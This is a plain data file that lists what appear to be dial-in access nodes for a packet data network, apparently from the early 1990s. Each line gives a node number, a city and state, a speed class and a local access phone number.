02744 # UNION/NEWARK NEW JERSEY HIGH 201/824-3044
02745 # BATON ROUGE LOUISIANA MED 504/291-0967
02753 SAN ANTONIO TEXAS HIGH 512/225-8002
02754 AUSTIN TEXAS HIGH 512/444-3280
02760 # NEW CASTLE PENNSYLVANIA LOW 412/658-5056
02771 # WHEELING WEST VIRGINIA LOW 304/233-7676
03001 DALLAS TEXAS HIGH 214/638-8888
03026 MERIDEN CONNECTICUT LOW 203/634-9249
03026 MDLTOWN/MERIDEN CONNECTICUT LOW 203/634-9249
03031 AURORA ILLINOIS LOW 708/844-0700
03031 ST. CHRLES/AURORA ILLINOIS LOW 708/844-0700
03035 # SAN FRANCISCO CALIFORNIA WATS 800/###-#### 03036 SAN FRANCISCO CALIFORNIA HIGH 415/974-1300
03046 SANTO DOMINGO DOMINICAN RPBL INTL 809/685-6151
03051 + TULSA OKLAHOMA HIGH 918/585-8400
03100 JACKSONVILLE FLORIDA MED 904/721-8100
03106 MISHAWAKA/SOUTH B INDIANA MED 219/234-5005
03106 SOUTH BEND INDIANA MED 219/234-5005
03107 BOULDER CITY NEVADA MED 702/293-0300
03107 LAS VEGAS/BOLDER NEVADA MED 702/293-0300
03112 # MORGANTOWN WEST VIRGINIA LOW 304/292-3092
03112 # WESTOVER/MORGANTO WEST VIRGINIA LOW 304/292-3092 03114 # CANTON OHIO LOW 216/456-0840
03120 # VALLEJO CALIFORNIA LOW 707/644-1192
03121 # AUGUSTA/MARTINEZ GEORGIA LOW 404/855-0442
03121 # MARTINEZ GEORGIA LOW 404/855-0442
03122 HUNTSVILLE ALABAMA MED 205/882-3003
03123 # MEDFORD OREGON LOW 503/772-0831
03125 # WILKES BARRE PENNSYLVANIA LOW 717/826-8991
03127 CORPUS CHRISTI TEXAS MED 512/883-8050
03137 # BURNABY/VANCOUVER BRITSH COLUMBI CANH 604/683-7620
03137 # VANCOUVER BRITSH COLUMBI CANH 604/683-7620
03144 ST. JOSEPH MISSOURI LOW 816/232-1455
03151 CHICAGO ILLINOIS HIGH 312/922-4601
03152 CHICAGO ILLINOIS HIGH 312/922-4601
03154 # FRANKFORT KENTUCKY LOW 502/223-0724
03165 FT. LAUDERDALE FLORIDA MED 305/463-0882
03165 HOLLYWD/FT. LAUDR FLORIDA MED 305/463-0882
03165 POMPNO BCH/FT. LD FLORIDA MED 305/463-0882
03166 TULSA OKLAHOMA HIGH 918/585-2010
03167 # TULSA OKLAHOMA HIGH 918/585-2706
03204 BUTLER PENNSYLVANIA LOW 412/283-2286
03213 # COCOA FLORIDA LOW 407/639-3022
03213 # MELBOURNE/COCOA FLORIDA LOW 407/639-3022
03213 # MERRIT ISLE/COCOA FLORIDA LOW 407/639-3022
03224 # NORTH HAMPTON NEW HAMPSHIRE LOW 603/964-7779
03230 # INDEPENDENCE/MISS MISSOURI HIGH 913/384-5012
03230 # KANSAS CITY/MISSI MISSOURI HIGH 913/384-5012
03230 # KANSAS CITY/MISSI KANSAS HIGH 913/384-5012
03230 # MISSION KANSAS HIGH 913/384-5012
03230 # SHAWNEE/MISSION KANSAS HIGH 913/384-5012
03263 PHILADELPHIA PENNSYLVANIA HIGH 215/592-8309
03266 COLUMBIA SOUTH CAROLINA MED 803/254-7563
03300 SACRAMENTO CALIFORNIA HIGH 916/448-4300
03302 NEW BEDFORD MASSACHUSETTS LOW 508/999-4521
03307 # CHICO CALIFORNIA LOW 916/343-4401
03322 MAYAQUEZ PUERTO RICO INTL 800/462-4213
03322 PONCE PUERTO RICO INTL 800/462-4213
03324 # ANNISTON ALABAMA LOW 205/236-3342
03344 # BURTON MICHIGAN LOW 313/743-8350
03344 # FLINT/BURTON MICHIGAN LOW 313/743-8350
03356 WATERBURY CONNECTICUT LOW 203/755-5994
03377 # POUGHKEEPSIE NEW YORK LOW 914/473-0401
03401 CAMDEN/PENNSAUKEN NEW JERSEY LOW 609/665-5600
03401 CHERRY HILL/PENNS NEW JERSEY LOW 609/665-5600
03401 PENNSAUKEN NEW JERSEY LOW 609/665-5600
03405 # FORT MEYERS FLORIDA LOW 813/337-0006
03406 LONG BEACH CALIFORNIA MED 213/435-0900
03406 NORWALK/LONG BEAC CALIFORNIA MED 213/435-0900
03406 SAN PEDRO/LONG BE CALIFORNIA MED 213/435-0900
03407 ALHAMBRA CALIFORNIA MED 818/308-1800
03407 ARCADIA/ALHAMBRA CALIFORNIA MED 818/308-1800
03407 EL MONTE/ALHAMBRA CALIFORNIA MED 818/308-1800
03407 PASADENA/ALHAMBRA CALIFORNIA MED 818/308-1800
03410 BEVERLY HILLS/SHR CALIFORNIA MED 818/789-9002
03410 CANOGA PARK/SHRM CALIFORNIA MED 818/789-9002
03410 SAN FERNANDO/SHM CALIFORNIA MED 818/789-9002
03410 SHERMAN OAKS CALIFORNIA MED 818/789-9002
03410 VAN NUYS/SHERMAN CALIFORNIA MED 818/789-9002
03410 WEST L.A./SHRMN O CALIFORNIA MED 818/789-9002
03412 # SALINAS CALIFORNIA LOW 408/754-2206
03415 NEW HAVEN/NO. HAV CONNECTICUT MED 203/773-0082
03415 NORTH HAVEN CONNECTICUT MED 203/773-0082
03420 KNOXVILLE TENNESSEE MED 615/690-1543
03422 + VILLE ST. LAURENT QUEBEC CANL 514/748-8057
03437 # GREENSBORO NORTH CAROLINA MED 919/273-0332
03443 # DALLAS TEXAS HIGH 214/630-5516
03453 BIRMINGHAM ALABAMA HIGH 205/942-0297
03456 CLEARWATER FLORIDA MED 813/441-9017
03456 ST. PETERSBRG/CLR FLORIDA MED 813/441-9017
03461 # DES MOINES IOWA MED 515/277-9684
03471 # FLAGSTAFF ARIZONA LOW 602/774-3857
03505 SANTA CRUZ CALIFORNIA MED 408/475-0981
03511 # BLOOMFIELD CONNECTICUT HIGH 203/242-1986
03514 # TALLAHASSEE FLORIDA LOW 904/878-2267
03515 # PENSACOLA FLORIDA LOW 904/477-3344
03516 # KALAMAZOO MICHIGAN MED 616/388-2130
03521 # POCATELLO IDAHO LOW 208/233-2501
03522 STOCKTON CALIFORNIA LOW 209/467-0601
03523 + AUSTIN TEXAS LOW 512/448-4611
03530 # DETROIT MICHIGAN HIGH 313/963-3460
03532 DES MOINES IOWA MED 515/277-7752
03533 # BINGHAMPTON NEW YORK LOW 607/724-4351
03543 COLUMBUS OHIO HIGH 614/221-1862
03545 # MONTGOMERY ALABAMA LOW 205/265-4570
03546 MOBILE ALABAMA MED 205/343-8414
03547 # ENID OKLAHOMA LOW 405/242-0113
03566 TOLEDO OHIO MED 419/255-7790
03572 # INDEPENDENCE MISSOURI HIGH 913/384-5012
03572 # KANSAS CITY/MISSI MISSOURI HIGH 913/384-5012
03572 # KANSAS CITY/MISSI KANSAS HIGH 913/384-5012
03572 # MISSION KANSAS HIGH 913/384-5012
03572 # SHAWNEE/MISSION KANSAS HIGH 913/384-5012
03603 # COLORADO SPRINGS COLORADO MED 719/590-1003
03606 # BOYNTN BCH/WPALM FLORIDA MED 407/471-9310
03606 # WEST PALM BEACH FLORIDA MED 407/471-9310
03607 # SAVANNAH GEORGIA LOW 912/232-6751
03614 # MANKATO MINNESOTA LOW 507/387-7313
03615 # MEMPHIS TENNESSEE MED 901/527-8122
03623 # ERIE PENNSYLVANIA LOW 814/456-8501
03624 RALEIGH NORTH CAROLINA LOW 919/829-0536
03625 # MIAMI FLORIDA HIGH 305/599-2964
03630 # IDAHO FALLS IDAHO LOW 208/522-3624
03634 GREENVILLE SOUTH CAROLINA MED 803/271-9213
03643 HARRISBURG/LEMOYN PENNSYLVANIA MED 717/763-6481
03643 LEMOYNE PENNSYLVANIA MED 717/763-6481
03651 # GREEN BAY WISCONSIN LOW 414/432-3064
03652 # TRENTON NEW JERSEY LOW 609/394-1900
03653 # FT. WAYNE INDIANA LOW 219/422-2581
03654 # SOUTHFIELD MICHIGAN MED 313/424-8024
03656 # EVANSVILLE INDIANA LOW 812/464-8181
03657 # BAKERSFIELD CALIFORNIA LOW 805/325-0371
03661 # CHARLESTON WEST VIRGINIA LOW 304/345-9575
03662 # ALLENTOWN/BETHLEH PENNSYLVANIA MED 215/865-6978
03662 # BETHLEHEM PENNSYLVANIA MED 215/865-6978
03663 MESA/PHOENIX ARIZONA HIGH 602/258-4528
03663 PHOENIX ARIZONA HIGH 602/258-4528
03666 LANSING MICHIGAN MED 517/482-5721
03673 # CARSON CITY NEVADA MED 702/885-8411
03673 # RENO/CARSON CITY NEVADA MED 702/885-8411 03675 # WORCESTER MASSACHUSETTS LOW 508/791-9000
03677 # JOPLIN MISSOURI LOW 417/781-8718
03703 HEMPSTEAD NEW YORK MED 516/485-7422
03703 MINEOLA/HEMPSTEAD NEW YORK MED 516/485-7422
03704 NIAGARA FALLS NEW YORK LOW 716/285-2561
03705 ALBANY NEW YORK MED 518/458-8300
03705 SCHENECTADY/ALBAN NEW YORK MED 518/458-8300
03706 SAN FRANCISCO CALIFORNIA HIGH 415/974-1300
03720 # WINSTON-SALEM NORTH CAROLINA MED 919/765-1221
03725 LOS ALTOS/SAN JOS CALIFORNIA HIGH 408/432-0804
03725 SAN JOSE CALIFORNIA HIGH 408/432-0804
03725 SANTA CLARA/SAN J CALIFORNIA HIGH 408/432-0804
03725 SUNNYVALE/SAN JOS CALIFORNIA HIGH 408/432-0804
03726 # BILLINGS MONTANA LOW 406/252-4880
03731 # SHREVEPORT LOUISIANA LOW 318/688-5840
03737 + CLEARWATER FLORIDA MED 813/443-4515
03774 # PORT ANGELES WASHINGTON LOW 206/452-6800
03775 # NEWARK OHIO LOW 614/345-8953
04000 LONGWOOD/ORLANDO FLORIDA MED 407/841-0020
04000 ORLANDO FLORIDA MED 407/841-0020
04004 BELLEVUE/SEATTLE WASHINGTON HIGH 206/285-0109
04004 SEATTLE WASHINGTON HIGH 206/285-0109
04014 PLEASANTON CALIFORNIA LOW 415/462-2101
04020 # TACOMA WASHINGTON LOW 206/572-2026
04025 MORRISTOWN NEW JERSEY LOW 201/539-1222
04027 # KINGSTON MASSACHUSETTS LOW 617/585-7616
04040 # NEW LONDON CONNECTICUT LOW 203/444-7030
04040 # NORWICH/NEW LONDO CONNECTICUT LOW 203/444-7030
04044 DANBURY CONNECTICUT LOW 203/797-9539
04045 HUNTINGTON/MELVIL NEW YORK MED 516/420-1221
04045 MELVILLE NEW YORK MED 516/420-1221
04046 + COLTON CALIFORNIA MED 714/872-0394
04061 # TACOMA WASHINGTON LOW 206/572-2026
04063 + CLEVELAND OHIO LOW 216/696-0545
04064 # TAMPA FLORIDA MED 813/933-6210
04073 # PINE BLUFF ARKANSAS LOW 501/535-2629
04074 # STEUBENVILLE/WNTS OHIO LOW 614/266-2170
04074 # WINTERSVILLE OHIO LOW 614/266-2170
04075 # ALEXANDRIA/FAIRFA VIRGINIA HIGH 703/352-3136
04075 # ARLINGTON/FAIRFAX VIRGINIA HIGH 703/352-3136
04075 # BETHESDA MARYLAND HIGH 703/352-3136
04075 # FAIRFAX VIRGINIA HIGH 703/352-3136
04075 # WASHINGTON D.C. HIGH 703/352-3136
04076 # FAIRFAX VIRGINIA HIGH 703/352-3136
04100 TAMPA FLORIDA MED 813/932-7070
04107 # FRESNO CALIFORNIA LOW 209/442-4328
04111 # MISSOULA MONTANA LOW 406/721-8960
04114 # CEDAR FALLS IOWA LOW 319/236-9020
04114 # WATERLOO IOWA LOW 319/236-9020
04117 # GRAND RAPIDS MICHIGAN MED 616/459-2304
04121 # ROANOKE VIRGINIA LOW 703/344-2762
04122 # MANCHESTER NEW HAMPSHIRE LOW 603/623-0409
04126 RAHWAY NEW JERSEY LOW 201/396-8550
04142 # LONGWOOD/ORLANDO FLORIDA MED 407/841-0217
04142 # ORLANDO FLORIDA MED 407/841-0217
04153 # SANTA ROSA CALIFORNIA LOW 707/527-6180
04154 # OXNARD/PRT HUENE CALIFORNIA MED 805/985-7843
04154 # PORT HUENEME CALIFORNIA MED 805/985-7843
04154 # VENTURA/HUENEME CALIFORNIA MED 805/985-7843
04157 # TUCSON ARIZONA MED 602/297-2239
04161 # ELKHART INDIANA LOW 219/293-8860
04164 # LAKELAND FLORIDA LOW 813/858-6970
04164 # WINTERHAVEN/LAKEL FLORIDA LOW 813/858-6970
04165 LAKELAND FLORIDA LOW 813/858-6970
04165 WINTERHAVEN/LAKEL FLORIDA LOW 813/858-6970
04166 # TRENTON NEW JERSEY LOW 609/394-1900
04175 ALAMEDA/OAKLAND CALIFORNIA HIGH 415/430-2900
04175 BERKELEY/OAKLAND CALIFORNIA HIGH 415/430-2900
04175 HAYWARD/OAKLAND CALIFORNIA HIGH 415/430-2900
04175 OAKLAND CALIFORNIA HIGH 415/430-2900
04212 ALBUQUERQUE NEW MEXICO MED 505/242-8344
04220 # PORTLAND MAINE LOW 207/775-5971
04222 # YOUNGSTOWN OHIO LOW 216/759-8892
04223 PHILADELPHIA PENNSYLVANIA HIGH 215/592-8309
04225 # BENTON HARBOR MICHIGAN LOW 616/925-3134
04225 # ST. JOE/BENTON HR MICHIGAN LOW 616/925-3134
04232 # HUNTINGTON/MELVIL NEW YORK MED 516/420-4579
04232 # MELVILLE NEW YORK MED 516/420-4579
04236 # ANAHEIM/NEWPRT BE CALIFORNIA HIGH 714/852-8141
04236 # IRVINE/NEWPORT BE CALIFORNIA HIGH 714/852-8141
04236 # NEWPORT BEACH CALIFORNIA HIGH 714/852-8141
04236 # SANTA ANA/NEWPRT CALIFORNIA HIGH 714/852-8141
04252 # SPRINGFIELD OHIO LOW 513/325-0511
04253 # BOISE IDAHO LOW 208/345-5951
04255 # SAN LUIS OBISPO CALIFORNIA LOW 805/549-0770 04257 MEMPHIS TENNESSEE MED 901/527-8006
04262 # ESCONDIDO/VISTA CALIFORNIA MED 619/941-6700
04262 # VISTA CALIFORNIA MED 619/941-6700
04263 # COVINA/DIAMOND CALIFORNIA MED 714/860-0057
04263 # DIAMOND BAR CALIFORNIA MED 714/860-0057
04263 # ONTARIO/DIAMOND CALIFORNIA MED 714/860-0057
04263 # POMONA/DIAMOND B CALIFORNIA MED 714/860-0057
04263 # W.COVINA/DIAMOND CALIFORNIA MED 714/860-0057
04277 ARLINGTON/FORT WO TEXAS MED 817/877-3630
04277 FORT WORTH TEXAS MED 817/877-3630
04304 # BLOOMFIELD CONNECTICUT HIGH 203/242-1986
04304 # HARTFORD/BLOOMFLD CONNECTICUT HIGH 203/242-1986
04305 # DECATUR ILLINOIS LOW 217/425-8864
04311 SPRINGFIELD ILLINOIS MED 217/525-8025
04313 NORFOLK VIRGINIA MED 804/855-7751
04313 PORTSMOUTH/NORFOL VIRGINIA MED 804/855-7751
04313 VIRGINIA BCH/NORF VIRGINIA MED 804/855-7751
04316 MINNEAPOLIS MINNESOTA HIGH 612/333-2799
04316 ST. PAUL/MINNEAPO MINNESOTA HIGH 612/333-2799
04321 # MINNEAPOLIS MINNESOTA HIGH 612/332-4024 04321 # ST PAUL/MINNEAPO MINNESOTA HIGH 612/332-4024
04325 # HEMPSTEAD NEW YORK MED 516/481-0150
04327 # SALEM OREGON LOW 503/370-4314
04330 # LUBBOCK TEXAS LOW 806/797-0765
04334 # NASHVILLE TENNESSEE HIGH 615/889-5790
04340 # BROWNSVILLE TEXAS LOW 512/548-1331
04346 ALEXANDRIA/FAIRF VIRGINIA HIGH 703/691-8200
04346 ARLINGTON/FAIRFA VIRGINIA HIGH 703/691-8200
04346 BETHESDA VIRGINIA HIGH 703/691-8200
04346 FAIRFAX VIRGINIA HIGH 703/691-8200
04346 WASHINGTON D.C. HIGH 703/691-8200
04351 # ATLANTIC CITY NEW JERSEY LOW 609/345-4050
04353 # BEVERLY HILLS/SH CALIFORNIA MED 818/789-9557
04353 # CANOGA PARK/SHRM CALIFORNIA MED 818/789-9557
04353 # SAN FERNANDO/SHR CALIFORNIA MED 818/789-9557
04353 # SHERMAN OAKS CALIFORNIA MED 818/789-9557
04353 # VAN NUYS/SHERMAN CALIFORNIA MED 818/789-9557
04353 # WEST L.A./SHRMN O CALIFORNIA MED 818/789-9557
04354 # PASCAGOULA MISSISSIPPI LOW 601/769-0121
04360 SAN DIEGO CALIFORNIA HIGH 619/296-3370
04363 # LAWRENCE KANSAS LOW 913/843-4870
04372 # NORRISTOWN PENNSYLVANIA WATS 800/###-####
04375 CONCORD NEW HAMPSHIRE LOW 603/228-4732
04406 ITHACA NEW YORK LOW 607/257-6601
04411 # BELMONT/REDWOOD C CALIFORNIA HIGH 415/361-8701
04411 # PALO ALTO/REDWD C CALIFORNIA HIGH 415/361-8701
04411 # REDWOOD CITY CALIFORNIA HIGH 415/361-8701
04415 # BIRMINGHAM ALABAMA HIGH 205/942-7898
04423 # CORPUS CHRISTI TEXAS MED 512/887-9621
04425 # MINNEAPOLIS MINNESOTA HIGH 612/332-4024
04425 # ST PAUL/MINNEAPOL MINNESOTA HIGH 612/332-4024
04430 NEWARK/WILMINGTON DELAWARE MED 302/652-2060
04430 WILMINGTON DELAWARE MED 302/652-2060
04440 # AUSTIN TEXAS HIGH 512/448-1096
04443 # COLUMBUS GEORGIA LOW 404/327-0597
04444 # COLUMBUS OHIO HIGH 614/221-1612
04447 # SALT LAKE UTAH HIGH 801/533-8152
04453 BELLEVUE/SEATTLE WASHINGTON HIGH 206/283-3677
04453 SEATTLE WASHINGTON HIGH 206/283-3677
04455 # DETROIT MICHIGAN HIGH 313/963-3460
04464 # SCRANTON PENNSYLVANIA LOW 717/348-0765
04466 # TEMPLE TEXAS LOW 817/773-0982
04467 # FREELAND MICHIGAN LOW 517/695-6751
04467 # MIDLAND/FREELAND MICHIGAN LOW 517/695-6751
04467 # SAGINAW/FREELAND MICHIGAN LOW 517/695-6751
04475 # SPRINGFIELD ILLINOIS MED 217/544-0312
04501 DETROIT MICHIGAN HIGH 313/962-2870
04504 # BURLINGAME/SO. S. CALIFORNIA LOW 415/588-3043
04504 # SAN MATEO/SOUTH S CALIFORNIA LOW 415/588-3043
04504 # SOUTH S.F. CALIFORNIA LOW 415/588-3043
04515 NEW YORK NEW YORK HIGH 212/943-4700
04516 NEW YORK NEW YORK HIGH 212/943-4700
04525 + COLUMBUS OHIO HIGH 614/224-0422
04530 CLEVELAND OHIO HIGH 216/241-0024
04542 # PLYMOUTH MICHIGAN MED 313/451-2400
04556 CONCORD/WALNUT C CALIFORNIA LOW 415/935-0370
04556 PACHECO/WALNUT CR CALIFORNIA LOW 415/935-0370
04556 PLEASNTHILL/WALNT CALIFORNIA LOW 415/935-0370
04556 WALNUT CREEK CALIFORNIA LOW 415/935-0370
04603 BELMONT/REDWOOD CALIFORNIA HIGH 415/366-1092
04603 PALO ALTO/REDWD CALIFORNIA HIGH 415/366-1092
04603 REDWOOD CITY CALIFORNIA HIGH 415/366-1092
04621 # JACKSON MISSISSIPPI LOW 601/355-9741
04650 INDEPENDENCE/MISS MISSOURI HIGH 913/384-1226
04650 KANSAS CITY/MISSI MISSOURI HIGH 913/384-1226
04650 KANSAS CITY/MISSI KANSAS HIGH 913/384-1226
04650 MISSION KANSAS HIGH 913/384-1226
04650 SHAWNEE/MISSION KANSAS HIGH 913/384-1226
04653 + MISSION KANSAS HIGH 913/384-0071
04653 + SHAWNEE/MISSION KANSAS HIGH 913/384-0071
04666 PITTSBURGH PENNSYLVANIA HIGH 412/642-6778
04667 # PITTSBURGH PENNSYLVANIA HIGH 412/642-2015
04671 # CLEVELAND OHIO HIGH 216/861-6709
04672 SYRACUSE NEW YORK MED 315/437-7111
04703 # BROOKFIELD WISCONSIN HIGH 414/785-0630
04703 # MILWAUKEE/BROOKF WISCONSIN HIGH 414/785-0630
04706 # BELLEVUE/SEATTLE WASHINGTON HIGH 206/281-7141
04706 # SEATTLE WASHINGTON HIGH 206/281-7141
04713 BOSTON MASSACHUSETTS HIGH 617/330-5107
04713 CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/330-5107
04722 # REDDING CALIFORNIA LOW 916/241-4820
04751 # FARGO NORTH DAKOTA LOW 701/280-0210
04755 EL SEGUNDO CALIFORNIA MED 213/643-2907
04755 MAR VISTA/EL SEGU CALIFORNIA MED 213/643-2907
04755 MARINADELREY/EL S CALIFORNIA MED 213/643-2907
04755 SANTA MONICA/EL S CALIFORNIA MED 213/643-2907
04757 # WINDSOR ONTARIO CANL 519/977-7256
04764 BRIDGETON/HAZELWD MISSOURI HIGH 314/731-8002
04764 HAZELWOOD MISSOURI HIGH 314/731-8002
04764 ST. LOUIS/HAZELWO MISSOURI HIGH 314/731-8002
04765 # BRIDGETON/HAZELWO MISSOURI HIGH 314/731-8283
04765 # HAZELWOOD MISSOURI HIGH 314/731-8283
04765 # ST LOUIS/HAZELWOO MISSOURI HIGH 314/731-8283
04770 # OSHKOSH WISCONSIN LOW 414/235-7473
04771 # JACKSON TENNESSEE LOW 901/423-1244
05013 # RAPID CITY SOUTH DAKOTA LOW 605/341-4007
05017 # HELENA MONTANA LOW 406/443-0112
05021 # SIOUX CITY IOWA LOW 712/255-3834
05043 # JACKSONVILLE FLORIDA MED 904/721-8559
05044 # COLUMBIA MISSOURI LOW 314/874-2771
05046 # UPLAND CALIFORNIA LOW 714/985-1153
05063 # TRAVERSE CITY MICHIGAN LOW 616/947-0050
05100 # CINCINNATI OHIO HIGH 513/530-9021
05104 # BURLINGTON VERMONT LOW 802/864-5714
05147 # GULFPORT MISSISSIPPI LOW 601/868-2331
05151 # TWIN FALLS IDAHO LOW 208/734-0221
05206 WHITE PLAINS NEW YORK HIGH 914/328-7730
05211 # EATONTOWN/RED BAN NEW JERSEY LOW 201/758-0337
05211 # LONG BRANCH/RED B NEW JERSEY LOW 201/758-0337
05211 # RED BANK NEW JERSEY LOW 201/758-0337
05221 # FLORENCE ALABAMA LOW 205/760-0030
05241 INGLEWOOD/VERNON CALIFORNIA HIGH 213/587-0030
05241 LOS ANGELES/VERNO CALIFORNIA HIGH 213/587-0030
05241 VERNON CALIFORNIA HIGH 213/587-0030
05242 INGLEWOOD/VERNON CALIFORNIA HIGH 213/587-0030
05242 LOS ANGELES/VERNO CALIFORNIA HIGH 213/587-0030
05242 VERNON CALIFORNIA HIGH 213/587-0030
05253 # CLARKESVILLE TENNESSEE LOW 615/645-8877
05256 # DURHAM NEW HAMPSHIRE LOW 603/868-1502
05260 SPOKANE WASHINGTON MED 509/624-1549
05264 # ROCKY MOUNT NORTH CAROLINA LOW 919/937-4828
05275 # ALEXANDRIA LOUISIANA LOW 318/445-2694
05276 # LAKE CHARLES LOUISIANA LOW 318/494-1991
05277 # PHILADELPHIA PENNSYLVANIA HIGH 215/592-8750
05302 # VICKSBURG MISSISSIPPI LOW 601/638-1551
05304 # FORT PIERCE FLORIDA LOW 407/466-5661
05307 # PEORIA ILLINOIS LOW 309/637-5961
05325 # COLTON/RIVERSIDE CALIFORNIA MED 714/422-0222
05325 # RIVERSIDE CALIFORNIA MED 714/422-0222
05325 # SAN BERNADINO/RIV CALIFORNIA MED 714/422-0222
05341 # ALAMEDA/OAKLAND CALIFORNIA HIGH 415/633-1896
05341 # BERKELEY/OAKLAND CALIFORNIA HIGH 415/633-1896
05341 # HAYWARD/OAKLAND CALIFORNIA HIGH 415/633-1896
05341 # OAKLAND CALIFORNIA HIGH 415/633-1896
05350 # ANTIOCH CALIFORNIA LOW 415/754-8222
05362 # CONCORD/WALNUT CR CALIFORNIA MED 415/935-1507
05362 # PACHECO/WALNUT CR CALIFORNIA MED 415/935-1507
05362 # PLEASNTHILL/WALNT CALIFORNIA MED 415/935-1507
05362 # WALNUT CREEK CALIFORNIA MED 415/935-1507
05365 # WAUSAU WISCONSIN LOW 715/848-6171
05366 PONTIAC MICHIGAN LOW 313/338-8384
05373 # NEW YORK NEW YORK HIGH 212/809-9660
05415 # WICHITA FALLS TEXAS LOW 817/723-2386
05431 # OPELIKA ALABAMA LOW 205/742-9040
05437 # BLOOMINGTON ILLINOIS LOW 309/827-2748
05441 WICHITA KANSAS MED 316/681-0832
05443 # WICHITA KANSAS MED 316/681-2719
05456 # PATERSON NEW JERSEY MED 201/742-0752
05456 # RIDGEWOOD/PATERSO NEW JERSEY MED 201/742-0752
05456 # WAYNE/PATERSON NEW JERSEY MED 201/742-0752
05464 BROCKTON/RANDOLPH MASSACHUSETTS LOW 617/986-0500
05464 RANDOLPH MASSACHUSETTS LOW 617/986-0500
05500 # AURORA/DENVER COLORADO HIGH 303/832-3447
05500 # BOULDER/DENVER COLORADO HIGH 303/832-3447
05500 # DENVER COLORADO HIGH 303/832-3447
05502 # JEFFERSON CITY MISSOURI LOW 314/634-8296
05503 # MCALLEN TEXAS LOW 512/631-6101
05504 # COEUR D’ALENE IDAHO LOW 208/765-1465
05514 # LONGVIEW WASHINGTON LOW 206/423-9072
05520 # LOUISVILLE KENTUCKY MED 502/499-9825
05523 NASHVILLE TENNESSEE HIGH 615/885-3530
05524 # PAWTUCKET/PROVDEN RHODE ISLAND HIGH 401/274-7380
05524 # PROVIDENCE RHODE ISLAND HIGH 401/274-7380
05524 # WARWICK/PROVIDENC RHODE ISLAND HIGH 401/274-7380
05526 # ALTOONA PENNSYLVANIA LOW 814/943-5848
05531 OCALA FLORIDA LOW 904/351-0305
05537 # COATESVILLE PENNSYLVANIA LOW 215/383-0440
05537 # DOWNINGTON/COATSV PENNSYLVANIA LOW 215/383-0440
05544 BROOKFIELD WISCONSIN HIGH 414/796-1087
05550 # BREMERTON WASHINGTON LOW 206/377-2792
05551 # LAKE BLUFF ILLINOIS LOW 708/295-7075
05551 # LIBRTYVLE/LAKE BL ILLINOIS LOW 708/295-7075 05552 # LAKE BLUFF ILLINOIS LOW 708/295-7075
05552 # LIBRTYVLE/LAKE BL ILLINOIS LOW 708/295-7075
05553 # BALTIMORE MARYLAND HIGH 301/528-9296
05554 # BALTIMORE MARYLAND HIGH 301/528-9296
05603 # YUMA ARIZONA LOW 602/343-9000
05605 ROCKFORD ILLINOIS MED 815/654-1900
05626 GALVESTON TEXAS LOW 409/762-8053
05626 TEXAS CITY/GALVES TEXAS LOW 409/762-8053
05627 # ELIZABETH/NEWARK NEW JERSEY HIGH 201/824-3044
05627 # JERSEY CITY/NEWRK NEW JERSEY HIGH 201/824-3044
05627 # NEWARK NEW JERSEY HIGH 201/824-3044
05627 # UNION/NEWARK NEW JERSEY HIGH 210/824-3044
05646 # SAN DIEGO CALIFORNIA HIGH 619/296-8747
05650 # CENTEREACH/LK GRV NEW YORK MED 516/471-6080
05650 # LAKE GROVE NEW YORK MED 516/471-6080
05650 # RONKONKOMA/LK GRV NEW YORK MED 516/471-6080
05671 # AMES IOWA LOW 515/232-0157
05672 + INDIANAPOLIS INDIANA HIGH 317/687-0305
05710 # SIOUX FALLS SOUTH DAKOTA LOW 605/334-0085
05715 # BRIDGETON/HAZELWO MISSOURI HIGH 314/731-8283 05715 # HAZELWOOD MISSOURI HIGH 314/731-8283
05715 # ST LOUIS/HAZELWD MISSOURI HIGH 314/731-8283
05716 # MANHATTAN KANSAS LOW 913/776-9803
05717 BRIDGETON/HAZELWD MISSOURI HIGH 314/731-0703
05717 HAZELWOOD MISSOURI HIGH 314/731-0703
05717 ST. LOUIS/HAZELWD MISSOURI HIGH 314/731-0703
05733 GAINESVILLE FLORIDA LOW 904/335-0544
05734 # BRYAN TEXAS LOW 409/823-1090
05734 # CLG STATN/BRYAN TEXAS LOW 409/823-1090
05763 # PHOENIX ARIZONA HIGH 602/258-0554
05763 # PHOENIX ARIZONA HIGH 602/258-0554
05773 # TORONTO ONTARIO CANH 416/365-7630
05774 # LEXINGTON KENTUCKY MED 606/266-7063
06003 # TORONTO ONTARIO CANH 416/365-7630
06014 ROSEVILLE MICHIGAN LOW 313/774-1000
06022 # SANTA MARIA CALIFORNIA LOW 805/922-3308
06035 ENGLEWOOD CLIFFS NEW JERSEY MED 201/567-9841
06035 FAIR LAWN/ENGLWD NEW JERSEY MED 201/567-9841
06037 # ENGLEWOOD CLIFFS NEW JERSEY MED 201/567-8951
06046 # PULLMAN WASHINGTON LOW 509/332-3760
06056 SAIPAN SAIPAN INTL 671/234-1121
06056 SAIPAN GUAM INTL 670/234-1121
06105 CHARLOTTE NORTH CAROLINA HIGH 704/377-0521
06106 OMAHA NEBRASKA MED 402/393-0903
06130 # MACON/WARNER ROBI GEORGIA LOW 912/923-7590
06130 # WARNER ROBINS GEORGIA LOW 912/923-7590
06147 # VISALIA CALIFORNIA LOW 209/625-4891
06151 # CINCINNATI OHIO HIGH 513/530-9021
06221 # LARAMIE WYOMING LOW 307/742-9441
06225 + SAN ANTONIO TEXAS HIGH 512-225-3213
06242 # FREDERICK/MYERSVI MARYLAND LOW 301/293-9504
06242 # HAGERSTOWN/MYERSV MARYLAND LOW 301/293-9504
06242 # MYERSVILLE MARYLAND LOW 301/293-9504
06256 ALEXANDRIA/FAIRFA VIRGINIA HIGH 703/385-7587
06256 ARLINGTON/FAIRFAX VIRGINIA HIGH 703/385-7587
06256 BETHESDA MARYLAND HIGH 703/385-7587
06256 FAIRFAX VIRGINIA HIGH 703/385-7587
06256 WASHINGTON D.C. HIGH 703/385-7587
06301 + REDWOOD CITY CALIFORNIA LOW 415/367-0334
06305 # FAYETTEVILLE ARKANSAS LOW 501/442-0234
06321 # CHICAGO ILLINOIS HIGH 312/922-6571
06324 CHICAGO ILLINOIS HIGH 312/427-7579
06325 # CHICAGO ILLINOIS HIGH 312/922-6571
06341 # FAYETTEVILLE NORTH CAROLINA LOW 919/486-0103
06342 # UTICA NEW YORK LOW 315/797-7001
06343 SPARTANBURG SOUTH CAROLINA LOW 803/585-0016
06346 # PORT ST. LUCIE FLORIDA LOW 407/337-1992
06347 # NEW CITY NEW YORK LOW 914/634-0388
06350 # NEDERLAND TEXAS LOG 409/721-3400
06350 # PORT ARTHUR TEXAS LOW 409/721-3400
